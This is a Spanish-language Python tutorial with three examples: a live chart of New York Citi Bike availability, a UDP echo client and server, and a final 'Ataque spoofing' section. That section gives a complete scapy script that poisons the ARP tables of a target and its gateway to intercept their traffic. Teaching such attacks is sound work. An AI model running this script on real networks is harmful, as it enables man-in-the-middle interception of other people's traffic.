# Ejemplos

Realizaremos a continuación diferentes ejercicions para ver como de útil y práctico puede llegar a ser el lenguaje Python en diferentes ámbitos.

## Bicicletas disponibles en NY

Como ya no he encontrado la api de bicing vamos a usar la de Nueva York. Iremos a la [URL de la api](https://gbfs.citibikenyc.com/gbfs/en/station_status.json) en el navegador para ver el formato de datos.

En este código vamos a usar la función `FuncAnimation` del paquete *matplotlib* para hacer una gráfica en tiempo real de los datos, la suma de todas las bicicletas mecánicas disponibles en el sistema público de bicicletas de Nueva York.

Se basa en una función *update** que ser irá llamando a intervalos de *1000 ms* (1 segundo) y seguidamente sumaremos las bicicletas disponibles en todas las estaciones y pasaremos a dibujar la evolución.

```Python
#!/usr/bin/env python3
import requests
import time
from datetime import datetime
from matplotlib import pyplot
from matplotlib.animation import FuncAnimation
from random import randrange

x_data, y_data = [], []

figure = pyplot.figure()
line, = pyplot.plot_date(x_data, y_data, '-')

def update(frame):
    x_data.append(datetime.now())
    stations = requests.get("https://gbfs.citibikenyc.com/gbfs/en/station_status.json").json()
    bikes_available = sum(list(s["num_bikes_available"] for s in stations["data"]["stations"]))
    y_data.append(bikes_available)
    line.set_data(x_data, y_data)
    figure.gca().relim()
    figure.gca().autoscale_view()
    return line,

animation = FuncAnimation(figure, update, interval=1000)

pyplot.show()
```

En este código creamos un gráfico con el método *pyplot* de la libreria *matplotlib*. Este método requiere de la definición del tipo de gráfico que vamos a realizar (figure) y del tipo de línia que vamos a realizar (line), en nuestro caso de tiempo (plot_date).

Seguidamente usamos la función `FuncAnimation` que internamente es un hilo a parte (thread). En realidad la función que le pasamos por referencia (update) será llamada cada ciertos segundos (1000 ms) y recogerá de la función el objeto `line` que dibujará en el gráfcio (figure).

Dentro de la función `update` añadimos la fecha actual, realizamos la petición a la API de estaciones de bici, sumamos las bicicletas de cada estación con una lista de comprensión y pasamos a añadir esos datos y a reajustar los ejes del gráfico, si fuera necesario.

El método `plot_date()` de `pyplot` está assignado a `line` con una coma. En python existen la tuplas, que són colecciones de elementos, pero a diferencia de las listas, las tuplas son immutables (no se pueden cambiar ni reordenar). A la hora de asignar colecciones de elementos (listas, tuplas, set...) podremos usar comas para asignar cada posición a una variable:

```
tupla = ("valor1","valor2")
v1,v2 = tupla
v1 = tupla[0]
v2 = tupla[1]
```

O con listas. En el ejemplo anterior se devuelve una lista de un único elemento y por lo tanto estas dos asignaciones son equivalentes:

```
lista = ["valor"]
val, = lista
val = lista[0]
```

Si quitamos la coma y no cogemos el primer valor [0] entonces estaríamos asignado la lista de nuevo a la nueva variable.

## Cliente - Servidor

Podemos implementar una simple aplicación que trabaje con *sockets* para comprobar el potencial de Python en redes.

Aquí tenemos un **servidor** escuchando en el puerto 12000 UPD:

```Python
#!/usr/bin/env python3
import random
import socket

server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_socket.bind(('', 12000))

while True:
    rand = random.randint(0, 10)
    message, address = server_socket.recvfrom(1024)
    message = message.upper()
    if rand >= 4:
        server_socket.sendto(message, address)
```

Tal como podemos ver, el mensaje recibido se convierte a mayúsculas con la propiedad `upper()` de las variables de tipo *string* antes de ser devuelto.

Se ha introducido la una aleatoriedad para forzar casos en los que no se reciba nada por parte de cliente.

Y aquí el cliente que envia peticiones:

```Python
#!/usr/bin/env python3
import time
import socket

for pings in range(10):
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    client_socket.settimeout(1.0)
    message = 'test'
    addr = ("127.0.0.1", 12000)

    client_socket.sendto(message, addr)
    print(f'MENSAJE ENVIADO: {message}')
    try:
        data, server = client_socket.recvfrom(1024)
        print(f'MENSAJE RECIBIDO: {data}')
    except socket.timeout:
        print('ERROR: No se ha recibido respuesta al mensaje enviado')
```

Al ejecutarlo deberíamos recibir mensajes y en caso de no recibirlos en el tiempo definido (1.0 segundos) entonces la librería devolverá una traza de error (Traceback).

En Python es muy útil el bloque *try/except* para controlar ciertos tipos de errores y poder así informar al usuario, o continuar con la ejecución ignorándolos.

Podemos usar también la utilidad `netcat` como cliente para enviar datos a nuestro servidor:

```
echo "python en redes" | netcat -u 127.0.0.1 12000
```


## Ataque spoofing

Podemos utilizar la librería `scapy` para procesar las tramas de la tarjeta de red. También para enviar las tramas que queramos.

En este ejemplo tenemos una función `get_mac` que nos devolverá la MAC de un dispositivo que haya en la red a partir de su IP.

```Python
from scapy.all import *

def get_mac(ip):
    arp_request = ARP(pdst = ip)
    broadcast = Ether(dst ="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast / arp_request
    respuesta = srp(arp_request_broadcast, timeout = 5, verbose = False)[0]
    return respuesta[0][1].hwsrc

print(get_mac("192.168.0.1"))
```

En el ejemplo completo, tenemos una segunda función que envia una trama ARP indicando que somos nosotros los que tenemos la dirección que esperan:

- para el cliente le estaremos diciendo que somos nosotros el gateway
- para el router le diremos que el cliente somos nosotros

Con esto lo que haremos es hacer que todo el tráfico entre ellos pase por nosotros.

Para instalar y ejecutar hay que hacerlo con permisos de superusuario: `sudo pip3 install scapy`

```Python
from scapy.all import *
import time

def get_mac(ip):
    arp_request = ARP(pdst = ip)
    broadcast = Ether(dst ="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast / arp_request
    respuesta = srp(arp_request_broadcast, timeout = 5, verbose = False)[0]
    return respuesta[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    packet = ARP(op = 2, pdst = target_ip, hwdst = get_mac(target_ip), psrc = spoof_ip)
    send(packet, verbose = False)

target_ip="192.168.0.199"
gateway_ip="192.168.0.1"
count = 0
while True:
        spoof(target_ip, gateway_ip)
        spoof(gateway_ip, target_ip)
        count = count + 2
        print(f"\rEnviadas {count} tramas ARP")
        time.sleep(2)
```

Si no hiciéramos el bucle cada 2 segundos, la tabla ARP del router y del cliente volverían a actualizar a las asignaciones MAC-IP originales ya que pasado unos segundos harían ellas de nuevo el proceso de descubrimiento ARP.

